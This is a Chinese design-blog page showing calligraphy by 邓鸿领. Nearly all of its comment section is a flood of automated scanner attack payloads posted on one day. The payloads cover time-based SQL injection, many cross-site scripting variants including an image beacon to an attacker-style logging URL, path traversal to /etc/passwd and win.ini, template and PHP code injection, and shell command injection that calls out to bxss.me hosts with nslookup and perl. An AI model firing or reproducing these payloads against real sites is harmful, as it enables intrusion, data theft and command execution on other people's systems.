您当前的位置: 设计师主页> 邓鸿领书法作品>

邓鸿领书法作品欣赏二(4幅)

发布时间:2014-12-15 19:29:39 分类:邓鸿领书法作品 来源:平面设计师 人气: 出处:www.floyou.com

邓鸿领书法作品欣赏二:同样是本站收集的邓鸿领以前所作说法,仅供朋友们欣赏!

邓鸿领书法

邓鸿领书法

邓鸿领书法

邓鸿领书法

邓鸿领书法家联系方式:18838100695(微信同号)


标签:邓鸿领  

本文地址:http://www.floyou.com/sheji/253.html

  •  189. pHqghUme
  • http://www.vulnweb.com
  • @@3LMYh
    pHqghUme 于 2021/6/18 5:58:35 回复
    1[URL][/URL][URL=http://][/URL][EMAIL][/EMAIL][EMAIL=@][/EMAIL][B][/B][I][/I][U][/U][S][/S][QUOTE][/QUOTE]HahaHeheLoveMisdoubtMusicNothing_to_saySadShameSleepSmileStopWhatAdoreAfter_boomAngryCoolCryEffortFaintGrimace
  • 2021/6/18 1:32:08 回复该留言
  •  187. pHqghUme
  • http://www.vulnweb.com
  • 1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  • 2021/6/18 1:31:51 回复该留言
  •  186. pHqghUme
  • http://www.vulnweb.com
  • 1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  • 2021/6/18 1:31:28 回复该留言
  •  185. pHqghUme
  • http://www.vulnweb.com
  • qREW4mVO')) OR 40=(SELECT 40 FROM PG_SLEEP(15))--
  • 2021/6/18 1:30:46 回复该留言
  •  184. pHqghUme
  • http://www.vulnweb.com
  • axvHIZvp') OR 899=(SELECT 899 FROM PG_SLEEP(15))--
  • 2021/6/18 1:29:45 回复该留言
  •  183. pHqghUme
  • http://www.vulnweb.com
  • HykS5ngt' OR 658=(SELECT 658 FROM PG_SLEEP(15))--
  • 2021/6/18 1:29:09 回复该留言
  •  182. pHqghUme
  • http://www.vulnweb.com
  • -1)) OR 351=(SELECT 351 FROM PG_SLEEP(15))--
  • 2021/6/18 1:28:49 回复该留言
  •  181. pHqghUme
  • http://www.vulnweb.com
  • -5) OR 701=(SELECT 701 FROM PG_SLEEP(15))--
  • 2021/6/18 1:28:31 回复该留言
  •  180. pHqghUme
  • http://www.vulnweb.com
  • -5 OR 296=(SELECT 296 FROM PG_SLEEP(15))--
  • 2021/6/18 1:28:24 回复该留言
  •  179. pHqghUme
  • http://www.vulnweb.com
  • DAVxHRDN'; waitfor delay '0:0:15' --
  • 2021/6/18 1:28:11 回复该留言
  •  178. pHqghUme
  • http://www.vulnweb.com
  • 1 waitfor delay '0:0:15' --
  • 2021/6/18 1:28:01 回复该留言
  •  177. pHqghUme
  • http://www.vulnweb.com
  • -1); waitfor delay '0:0:15' --
  • 2021/6/18 1:27:54 回复该留言
  •  176. pHqghUme
  • http://www.vulnweb.com
  • -1; waitfor delay '0:0:15' --
  • 2021/6/18 1:27:48 回复该留言
  •  175. pHqghUme
  • http://www.vulnweb.com
  • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  • 2021/6/18 1:27:40 回复该留言
  •  174. pHqghUme
  • http://www.vulnweb.com
  • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  • 2021/6/18 1:27:33 回复该留言
  •  173. pHqghUme
  • http://www.vulnweb.com
  • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  • 2021/6/18 1:27:27 回复该留言
  •  172. pHqghUme
  • http://www.vulnweb.com
  • if(now()=sysdate(),sleep(15),0)
  • 2021/6/18 1:27:19 回复该留言
  •  171. pHqghUme
  • http://www.vulnweb.com
  • -1" OR 3+847-847-1=0+0+0+1 --
  • 2021/6/18 1:27:00 回复该留言
  •  170. pHqghUme
  • http://www.vulnweb.com
  • -1" OR 2+847-847-1=0+0+0+1 --
  • 2021/6/18 1:26:55 回复该留言
  •  169. pHqghUme
  • http://www.vulnweb.com
  • -1' OR 3+351-351-1=0+0+0+1 or 'WlZCKXYo'='
  • 2021/6/18 1:26:51 回复该留言
  •  168. pHqghUme
  • http://www.vulnweb.com
  • -1' OR 2+351-351-1=0+0+0+1 or 'WlZCKXYo'='
  • 2021/6/18 1:26:45 回复该留言
  •  167. pHqghUme
  • http://www.vulnweb.com
  • -1' OR 3+635-635-1=0+0+0+1 --
  • 2021/6/18 1:26:36 回复该留言
  •  166. pHqghUme
  • http://www.vulnweb.com
  • -1' OR 2+635-635-1=0+0+0+1 --
  • 2021/6/18 1:26:29 回复该留言
  •  165. pHqghUme
  • http://www.vulnweb.com
  • -1 OR 3+579-579-1=0+0+0+1
  • 2021/6/18 1:26:22 回复该留言
  •  164. pHqghUme
  • http://www.vulnweb.com
  • -1 OR 2+579-579-1=0+0+0+1
  • 2021/6/18 1:26:16 回复该留言
  •  163. pHqghUme
  • http://www.vulnweb.com
  • -1 OR 3+844-844-1=0+0+0+1 --
  • 2021/6/18 1:26:08 回复该留言
  •  162. pHqghUme
  • http://www.vulnweb.com
  • -1 OR 2+844-844-1=0+0+0+1 --
  • 2021/6/18 1:26:02 回复该留言
  •  148. pHqghUme
  • http://www.vulnweb.com
  • 1<img sRc='http://attacker-9640/log.php?
  • 2021/6/18 1:09:38 回复该留言
  •  146. pHqghUme
  • http://www.vulnweb.com
  • 1<OqjVNo x=9745>
  • 2021/6/18 1:09:33 回复该留言
  •  144. pHqghUme
  • http://www.vulnweb.com
  • 1<ifRAme sRc=9407.com></IfRamE>
  • 2021/6/18 1:09:29 回复该留言
  •  142. pHqghUme
  • http://www.vulnweb.com
  • 1<WQSOXP>VRC5J[!+!]</WQSOXP>
  • 2021/6/18 1:09:24 回复该留言
  •  140. pHqghUme
  • http://www.vulnweb.com
  • 1PXoFV
    <ScRiPt >rGrK(9411)</ScRiPt>
  • 2021/6/18 1:09:19 回复该留言
  •  138. pHqghUme
  • http://www.vulnweb.com
  • 1<% contenteditable onresize=rGrK(9468)>
  • 2021/6/18 1:09:14 回复该留言
  •  136. pHqghUme
  • http://www.vulnweb.com
  • 1}body{acu:Expre/**/SSion(rGrK(9020))}
  • 2021/6/18 1:09:10 回复该留言
  •  134. pHqghUme
  • http://www.vulnweb.com
  • <a HrEF=jaVaScRiPT:>
  • 2021/6/18 1:09:06 回复该留言
  •  132. pHqghUme
  • http://www.vulnweb.com
  • <a HrEF=http://xss.bxss.me></a>
  • 2021/6/18 1:09:01 回复该留言
  •  130. pHqghUme
  • http://www.vulnweb.com
  • 1<input autofocus onfocus=rGrK(9582)>
  • 2021/6/18 1:08:56 回复该留言
  •  128. pHqghUme
  • http://www.vulnweb.com
  • �<img acu onmouseover=rGrK(90461) //�>
  • 2021/6/18 1:08:52 回复该留言
  •  126. pHqghUme
  • http://www.vulnweb.com
  • 1&lt;ScRiPt&gt;rGrK(9673)&lt;/sCripT&gt;
  • 2021/6/18 1:08:48 回复该留言
  •  125. pHqghUme
  • http://www.vulnweb.com
  • 1\u003CScRiPt\rGrK(9976)\u003C/sCripT\u003E
  • 2021/6/18 1:08:43 回复该留言
  •  124. pHqghUme
  • http://www.vulnweb.com
  • %31%3C%53%63%52%69%50%74%20%3E%72%47%72%4B%289292%29%3C%2F%73%43%72%69%70%54%3E
  • 2021/6/18 1:08:38 回复该留言
  •  123. pHqghUme
  • http://www.vulnweb.com
  • 1<img/src=">" onerror=alert(9063)>
  • 2021/6/18 1:08:33 回复该留言
  •  122. pHqghUme
  • http://www.vulnweb.com
  • 1<img src=xyz OnErRor=rGrK(9259)>
  • 2021/6/18 1:08:29 回复该留言
  •  120. pHqghUme
  • http://www.vulnweb.com
  • 1<img src=//xss.bxss.me/t/dot.gif onload=rGrK(9573)>
  • 2021/6/18 1:08:25 回复该留言
  •  118. pHqghUme
  • http://www.vulnweb.com
  • 1<body onload=rGrK(9900)>
  • 2021/6/18 1:08:20 回复该留言
  •  116. pHqghUme
  • http://www.vulnweb.com
  • 1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9315'>
  • 2021/6/18 1:08:16 回复该留言
  •  114. pHqghUme
  • http://www.vulnweb.com
  • 1<isindex type=image src=1 onerror=rGrK(9438)>
  • 2021/6/18 1:08:12 回复该留言
  •  109. pHqghUme
  • http://www.vulnweb.com
  • 1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9579></ScRiPt>
  • 2021/6/18 1:08:01 回复该留言
  •  108. pHqghUme
  • http://www.vulnweb.com
  • 1<ScRiPt
    >rGrK(9827)</ScRiPt>
  • 2021/6/18 1:07:58 回复该留言
  •  106. pHqghUme
  • http://www.vulnweb.com
  • 1<ScR<ScRiPt>IpT>rGrK(9449)</sCr<ScRiPt>IpT>
  • 2021/6/18 1:07:54 回复该留言
  •  105. pHqghUme
  • http://www.vulnweb.com
  • 1<script>rGrK(9213)</script>
  • 2021/6/18 1:07:52 回复该留言
  •  104. pHqghUme
  • http://../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
  • 1
  • 2021/6/18 1:07:50 回复该留言
  •  103. pHqghUme
  • http://www.vulnweb.com
  • 1<WB73AI>02VAE[!+!]</WB73AI>
  • 2021/6/18 1:07:47 回复该留言
  •  102. pHqghUme
  • http://../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
  • 1
  • 2021/6/18 1:07:45 回复该留言
  •  101. pHqghUme
  • http://www.vulnweb.com
  • 1<ScRiPt >rGrK(9015)</ScRiPt>
  • 2021/6/18 1:07:42 回复该留言
  •  100. pHqghUme
  • http://www.vulnweb.com
  • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
  • 2021/6/18 1:07:37 回复该留言
  •  99. pHqghUme
  • http://www.vulnweb.com
  • acx__${98991*97996}__::.x
  • 2021/6/18 1:07:32 回复该留言
  •  98. pHqghUme
  • http://www.vulnweb.com
  • acx[[${98991*97996}]]xca
  • 2021/6/18 1:07:27 回复该留言
  •  97. pHqghUme
  • http:///../../../../../../../../../../boot.ini
  • 1
  • 2021/6/18 1:07:25 回复该留言
  •  96. pHqghUme
  • http://www.vulnweb.com
  • acx{{98991*97996}}xca
  • 2021/6/18 1:07:23 回复该留言
  •  95. pHqghUme
  • http://../../../../../../../../../../windows/win.ini
  • 1
  • 2021/6/18 1:07:20 回复该留言
  •  94. pHqghUme
  • http://www.vulnweb.com
  • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
  • 2021/6/18 1:07:18 回复该留言
  •  93. pHqghUme
  • http://www.vulnweb.com
  • <th:t="${acx}#foreach
  • 2021/6/18 1:07:14 回复该留言
  •  91. pHqghUme
  • http://www.vulnweb.com
  • <%={{={@{#{${acx}}%>
  • 2021/6/18 1:07:10 回复该留言
  •  89. pHqghUme
  • http://www.vulnweb.com
  • acux5336��z1��z2a�bcxuca5336
  • 2021/6/18 1:07:06 回复该留言
  •  87. pHqghUme
  • http://www.vulnweb.com
  • acu6057<s1﹥s2ʺs3ʹuca6057
  • 2021/6/18 1:07:02 回复该留言
  •  84. pHqghUme
  • http://../././../././../././../././../././../././../././../././../././../././etc/passwd
  • 1
  • 2021/6/18 1:06:55 回复该留言
  •  83. pHqghUme
  • http://www.vulnweb.com
  • '"()&%<acx><ScRiPt >rGrK(9185)</ScRiPt>
  • 2021/6/18 1:06:53 回复该留言
  •  82. pHqghUme
  • http://www.vulnweb.com
  • 1'"()&%<acx><ScRiPt >rGrK(9343)</ScRiPt>
  • 2021/6/18 1:06:49 回复该留言
  •  80. pHqghUme
  • http://www.vulnweb.com
  • '.print(md5(31337)).'
  • 2021/6/18 1:06:43 回复该留言
  •  78. pHqghUme
  • http://www.vulnweb.com
  • ${@print(md5(31337))}\
  • 2021/6/18 1:06:39 回复该留言
  •  77. pHqghUme
  • http://www.vulnweb.com
  • ;(nslookup hituwsqfqeqvoeef2c.bxss.me||perl -e "gethostbyname('hituwsqfqeqvoeef2c.bxss.me')")|(nslookup hituwsqfqeqvoeef2c.bxss.me||perl -e "gethostbyname('hituwsqfqeqvoeef2c.bxss.me')")&(nslookup hituwsqfqeqvoeef2c.bxss.me||perl -e "gethostbyname('hituwsqfqeqvoeef2c.bxss.me')")
  • 2021/6/18 1:06:37 回复该留言
  •  75. pHqghUme
  • http://www.vulnweb.com
  • ${@print(md5(31337))}
  • 2021/6/18 1:06:33 回复该留言
  •  74. pHqghUme
  • http://www.vulnweb.com
  • `(nslookup hitpxtdaqhyiu74298.bxss.me||perl -e "gethostbyname('hitpxtdaqhyiu74298.bxss.me')")`
  • 2021/6/18 1:06:32 回复该留言
  •  70. pHqghUme
  • http://www.vulnweb.com
  • ";print(md5(31337));$a="
  • 2021/6/18 1:06:24 回复该留言
  •  69. pHqghUme
  • http://www.vulnweb.com
  • |(nslookup hitscjhlqcwqea739e.bxss.me||perl -e "gethostbyname('hitscjhlqcwqea739e.bxss.me')")
  • 2021/6/18 1:06:23 回复该留言
  •  67. pHqghUme
  • http://../../../../../../../../../../etc/passwd
  • 1
  • 2021/6/18 1:06:19 回复该留言
  •  66. pHqghUme
  • http://www.vulnweb.com
  • ';print(md5(31337));$a='
  • 2021/6/18 1:06:17 回复该留言
  •  65. pHqghUme
  • http://www.vulnweb.com
  • &(nslookup hitsqghrxntqmcfaf8.bxss.me||perl -e "gethostbyname('hitsqghrxntqmcfaf8.bxss.me')")&'\"`0&(nslookup hitsqghrxntqmcfaf8.bxss.me||perl -e "gethostbyname('hitsqghrxntqmcfaf8.bxss.me')")&`'
  • 2021/6/18 1:06:16 回复该留言
  •  63. pHqghUme
  • http://www.vulnweb.com
  • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
  • 2021/6/18 1:06:12 回复该留言
  •  62. pHqghUme
  • http://www.vulnweb.com
  • $(nslookup hitdsymkykcty991bf.bxss.me||perl -e "gethostbyname('hitdsymkykcty991bf.bxss.me')")
  • 2021/6/18 1:06:10 回复该留言
  •  60. pHqghUme
  • http://www.vulnweb.com
  • (nslookup hitjtgwcwrrwm527ce.bxss.me||perl -e "gethostbyname('hitjtgwcwrrwm527ce.bxss.me')")
  • 2021/6/18 1:06:06 回复该留言
  •  57. pHqghUme
  • http://www.vulnweb.com
  • |echo gwsnwa$()\ hiqowk\nz^xyu||a #' |echo gwsnwa$()\ hiqowk\nz^xyu||a #|" |echo gwsnwa$()\ hiqowk\nz^xyu||a #
  • 2021/6/18 1:05:59 回复该留言
  •  55. pHqghUme
  • http://www.vulnweb.com
  • /\xfs.bxss.me
  • 2021/6/18 1:05:54 回复该留言
  •  53. pHqghUme
  • http://www.vulnweb.com
  • &echo bccixp$()\ oevbmq\nz^xyu||a #' &echo bccixp$()\ oevbmq\nz^xyu||a #|" &echo bccixp$()\ oevbmq\nz^xyu||a #
  • 2021/6/18 1:05:51 回复该留言
  •  51. pHqghUme
  • http://www.vulnweb.com
  • //xfs.bxss.me
  • 2021/6/18 1:05:47 回复该留言
  •  49. pHqghUme
  • http://www.vulnweb.com
  • echo qgzood$()\ otytqj\nz^xyu||a #' &echo qgzood$()\ otytqj\nz^xyu||a #|" &echo qgzood$()\ otytqj\nz^xyu||a #
  • 2021/6/18 1:05:43 回复该留言
  •  47. pHqghUme
  • http://www.vulnweb.com
  • http://xfs.bxss.me
  • 2021/6/18 1:05:40 回复该留言
  •  42. pHqghUme
  • http://www.vulnweb.com
  • '+'A'.concat(70-3).concat(22*4).concat(107).concat(90).concat(100).concat(80)+(require'socket'
    Socket.gethostbyname('hitjh'+'ndzqskeccfd7d.bxss.me.')[3].to_s)+'
  • 2021/6/18 1:05:32 回复该留言
  •  40. pHqghUme
  • http://www.vulnweb.com
  • http://bxss.me/t/fit.txt?.jpg
  • 2021/6/18 1:05:29 回复该留言
  •  39. pHqghUme
  • http://www.vulnweb.com
  • /xfs.bxss.me
  • 2021/6/18 1:05:27 回复该留言
  •  38. pHqghUme
  • http://www.vulnweb.com
  • "+"A".concat(70-3).concat(22*4).concat(116).concat(76).concat(121).concat(84)+(require"socket"
    Socket.gethostbyname("hiteo"+"ozgoimvzbd30f.bxss.me.")[3].to_s)+"
  • 2021/6/18 1:05:26 回复该留言
  •  37. pHqghUme
  • http://www.vulnweb.com
  • Http://bxss.me/t/fit.txt
  • 2021/6/18 1:05:22 回复该留言
  •  35. pHqghUme
  • http://www.vulnweb.com
  • 1some_inexistent_file_with_long_name
  • 2021/6/18 1:05:19 回复该留言
  •  33. pHqghUme
  • http://www.vulnweb.com
  • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  • 2021/6/18 1:05:16 回复该留言
  •  31. pHqghUme
  • http://www.vulnweb.com
  • http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
  • 2021/6/18 1:05:13 回复该留言
  •  30. pHqghUme
  • http://www.vulnweb.com
  • bxss.me/t/xss.html?%00
  • 2021/6/18 1:05:11 回复该留言
  •  27. pHqghUme
  • http://www.vulnweb.com
  • ^(#$!@#$)(()))******
  • 2021/6/18 1:05:07 回复该留言
  •  26. pHqghUme
  • http://www.vulnweb.com
  • HttP://bxss.me/t/xss.html?%00
  • 2021/6/18 1:05:04 回复该留言
  •  24. pHqghUme
  • http://www.vulnweb.com
  • !(()&&!|*|*|
  • 2021/6/18 1:05:01 回复该留言
  •  22. pHqghUme
  • http://www.vulnweb.com
  • ../../../../../../../../../../../../../../windows/win.ini
  • 2021/6/18 1:04:58 回复该留言
  •  19. pHqghUme
  • http://www.vulnweb.com
  • ../../../../../../../../../../../../../../etc/passwd
  • 2021/6/18 1:04:52 回复该留言
  •  17. pHqghUme
  • http://www.vulnweb.com
  • ".gethostbyname(lc("hiteu"."vvxnjlcn48422.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(68).chr(110).chr(84)."
  • 2021/6/18 1:04:49 回复该留言
  •  15. pHqghUme
  • http://www.vulnweb.com
  • '.gethostbyname(lc('hittx'.'szrrusxfd4351.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(88).chr(114).chr(72).'
  • 2021/6/18 1:04:45 回复该留言
  •  13. pHqghUme
  • http://www.vulnweb.com
  • 1&n976133=v913578
  • 2021/6/18 1:04:40 回复该留言
  •  11. pHqghUme
  • http://www.vulnweb.com
  • "+response.write(9450798*9905543)+"
  • 2021/6/18 1:04:34 回复该留言
  •  10. pHqghUme
  • http://www.vulnweb.com
  • 12345'"\'\");|]*
  • 2021/6/18 1:04:31 回复该留言
  •  8. pHqghUme
  • http://www.vulnweb.com
  • '+response.write(9450798*9905543)+'
  • 2021/6/18 1:04:28 回复该留言
  •  6. pHqghUme
  • http://www.vulnweb.com
  • response.write(9450798*9905543)
  • 2021/6/18 1:04:25 回复该留言
  •  4. pHqghUme
  • http://www.vulnweb.com
  • ${10000186+9999820}
  • 2021/6/18 1:04:23 回复该留言
  •  3. pHqghUme
  • http://www.vulnweb.com
  • 1<esi:include src="http://bxss.me/rpb.png"/>
  • 2021/6/18 1:04:19 回复该留言
  •  2. pHqghUme
  • http://www.vulnweb.com
  • r3jJ1cSw
  • 2021/6/18 1:04:13 回复该留言

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

平面设计师博客提供:标志设计包装设计单页设计广告设计画册设计以及海报设计等服务!
部分内容源自于网络,触犯到您的利益请联系站长删除!小小站长不易,请多多留情! 豫ICP备09037741号 © 2020